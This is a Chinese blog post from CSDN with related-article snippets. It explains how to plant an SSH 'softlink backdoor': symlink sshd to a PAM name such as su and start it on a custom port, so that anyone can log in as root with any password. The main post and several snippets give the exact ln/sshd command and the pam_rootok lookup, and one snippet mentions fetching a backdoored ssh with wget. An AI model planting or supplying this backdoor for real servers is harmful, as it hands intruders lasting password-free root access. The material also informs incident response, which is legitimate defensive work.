SSH软连接后门

已于 2023-03-13 12:22:17 修改
阅读量326 收藏
点赞数 1
文章标签: ssh 服务器 linux
于 2023-03-13 09:46:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45209228/article/details/129485451
版权

  1. 查看SSH配置中是否开启了PAM身份验证,通过以下命令:

    cat /etc/ssh/sshd_config|grep UsePAM

UsePAM yes

  2. 建立软连接后门 ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
    注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find /etc/pam.d | xargs grep “pam_rootok”,出现的则可以用作软链接名称

    grep: /etc/pam.d: 是一个目录
/etc/pam.d/su:auth       sufficient pam_rootok.so
/etc/pam.d/su:# permitted earlier by e.g. "sufficient pam_rootok.so").
/etc/pam.d/chsh:auth		sufficient	pam_rootok.so
/etc/pam.d/chfn:auth		sufficient	pam_rootok.so
/etc/pam.d/runuser:auth		sufficient	pam_rootok.so

    测试
    使用root执行命令
    ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
    然后使用ssh任意密码连接12345端口即可登录root

  3. 原理
    (1) pam_rootok.so模块:pam_rootok.so主要作用是使得uid为0的用户,即root用户可以直接通过认证而不需要输入密码。我们查看/etc/pam.d/su 文件中,我们可以看到使用了该模块,这也是为什么root用户切换至普通用户不需要密码的原因。
    (2) PAM认证机制,若sshd服务中开启了PAM认证机制(默认开启),当程序执行时,PAM模块则会搜寻PAM相关设定文件,设定文件一般是在/etc/pam.d/。若关闭则会验证密码,无法建立软链接后门。
    (3) 当我们通过特定的端口连接ssh后,应用在启动过程中就会去找到配置文件,如:我们的软链接文件为/usr/local/su,那么应用就会找/etc/pam.d/su作为配置文件,那么则实现了无密登录。

ghcjs
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSH连接工具
02-12
SSH连接工具,windows与linux互传文件,可视化操作很方便。
ssh软链接后门
weixin_45261436的博客
05-26 246
利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok模块中使得 uid 为 0 可以直接通过认证而不需要输入密码,这样就导致了可以使用任意密码登录。如:我们的软链接文件为/tmp/su,那么应用就会找/etc/pam.d/su作为配置文件,那么则实现了无密登录。当我们通过特定的端口连接ssh后,应用在启动过程中就会去找到配置文件。出现的则可以用作软链接名称。
ssh软连接后门
weixin_60719780的博客
05-23 467
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中会去PAM配置文件中寻找是否存在对应名称的配置信息(su),su在pam_rootok只检测uid 0 即认证成功,导致可以使用任意密码去登录。
SSH软链接后门利用和原理
Jeeseen123的博客
08-23 1255
SSH软链接后门利用和原理 本文由锦行科技的安全研究团队提供,主要介绍SSH软连接后门的利用和相关原理。 00 利用前提 ssh配置中开启了PAM进行身份验证 查看是否使用PAM进行身份验证:cat/etc/ssh/sshd_config|grep UsePAM 01 建立后门 建立软连接后门:ln-sf/usr/sbin/sshd/tmp/su;/tmp/su-oPort=1234 注意:软链接的路径不是绝对的,但名字不是随便命名的,使用命令find/etc/pam.d|xargs grep "pam_r
LINUX后门--教程(二)—— SSH软链接后门
W小哥
06-02 4291
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、添加SSH后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机) ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 ...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
Unix ssh快速后门
10-22
Unix ssh快速后门linux 添加ssh后门ssh后门维持,linux定时任务,按照文档安装配置,可实现linux ssh后门登录
SSH 连接工具
05-06
很好的LINUX 连接工具,支持 方便快捷的视图话文件传输操作,支持 纯命令行方式操作。
backdoored-ssh:后门 ssh
07-22
后门 ssh 我只是遵循了这个指南: :
ssh数据库连接池proxool
03-12
自己整理好的ssh连接池技术 并带有资料 很多种配置方式 这里我主要弄的是proxool方式 也是非常好用 经常用的一种 带有步骤 按上面配置就可以成功使用 带有所需jar包
通过SSH后门(创建ssh软链接)
songling515010475的专栏
05-10 2158
一、判断sshd_config配置中的UsePAM参数是否为yes cat /etc/ssh/sshd_config 二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。 三、通过命令创建后门软链接,通过查看端口己监听。 ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345 netstat -antlp 四、通过另一台机器ssh进行任意密码登
操作系统权限维持(十)之Linux系统-SSH 软连接后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 444
软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 只检测 uid 0 即可认证成功,这样就导致了可以使用任意密码登录
SSH的软链接后门
a790308的博客
08-26 1529
之前说过为了防止SSH的后面漏洞 , 升级到高版本的OpenSSH , 那也不能保证万无一失 经典后门 直接对sshd建立软连接 , 之后用任意密码登录即可 看下面操作 创建完软连接后 创建新的会话 端口自定义 用户root 密码任意输入 登录成功 换个普通用户 登录成功 转载于:https://www.cnbl...
linux 创建连接命令 ln -s 软连接
01-08 638
这是linux中一个非常重要命令,请大家一定要熟悉。它的功能是为某一个文件在另外一个位置建立一个同不的链接,这个命令最常用的参数是-s, 具体用法是:ln -s 源文件 目标文件。 当 我们需要在不同的目录,用到相同的文件时,我们不需要在每一个需要的目录下都放一个必须相同的文件,我们只要在某个固定的目录,放上该文件,然后在其它的 目录下用ln命令链接(link)它就可以,不必重复的占...
linux 简单ssh后门,Linux软连接ssh后门之我见
weixin_39682897的博客
05-12 891
0x00 前言学习了Sevck发表Linux软连接后门的《一条命令引发的思考》,还是存在几个疑惑点,仔细探究之后就有了这篇文章0x01简单回顾一、Linux经典软连接后门命令1.在被控制端执行:ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345建立sshd的软连接2.本地客户端执行:ssh [emailprotected] -p 12345接着输...
ssh后门介绍与防御
有勇气的牛排博客
08-04 1443
文章目录1 介绍2 实战演练2.1 查看版本2.2 下载SSH配置文件2.3 安装2.4 修改后门密码and文件记录2.5 编译安装2.6 摸出痕迹3 防御ssh后门 1 介绍 当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。 2 实战演练 实验环境:Centos7 2.1 查看版本 ssh -v 可以对ssh备份配置文件,可以对后期的文件时间进行修改 cp -p /etc/ssh/ssh_config / etc/
Linux PAM&&PAM后门
ronon77的专栏
03-17 242
0x00 PAM简介 PAM (Pluggable Authentication Modules )是由Sun提出的一种认证机制。它通过提供一些动态链接库和一套统一的API,将系统提供的服务和该服务的认证方式分开,使得系统管理员可以灵活地根据需要给不同的服务配置不同的认证方式而无需更改服务程序,同时也便于向系统中添加新的认证手段。PAM最初是集成在Solaris中,目前已移植到其它系统中,如...
ssh通过nfs挂载,创建软连接,实现免密码登录
KNIFE_PAN的专栏
12-11 1712
ssh通过nfs挂载,创建软连接,实现免密码登录,不能登陆原因: 1.权限问题 你创建的共享文件夹权限是 700 共享文件夹里面创建.ssh的权限700 .ssh里面authorized_keys 的权限 644 2.selinux问题 请你确认你也关闭selinux 永久关闭selinux方法 修改/etc/sysconfig/selinux SELINUX=disable
渗透linuxssh,Linux系统安全之ssh后门
weixin_31559919的博客
05-12 162
1.ssh -V#查看当前的ssh版本信息#OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 20102.查找ssh的配置文件一般都在/etc/ssh中3.备份原来的文件的time将/etc/ssh下的文件的备份假设/etc/ssh/sshd_config 备份为/etc/ssh/sshd_config.old4.wget存在后门ssh#http://core.i...
SSH软链接后门,Permission denied, please try again.
最新发布
09-02
综上所述,如果在SSH软链接后门中出现"Permission denied, please try again"的报错信息,你可以首先检查.ssh目录和authorized_keys文件的权限,同时确保SSH服务正常运行并检查网络连接的稳定性。如果问题仍然存在,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值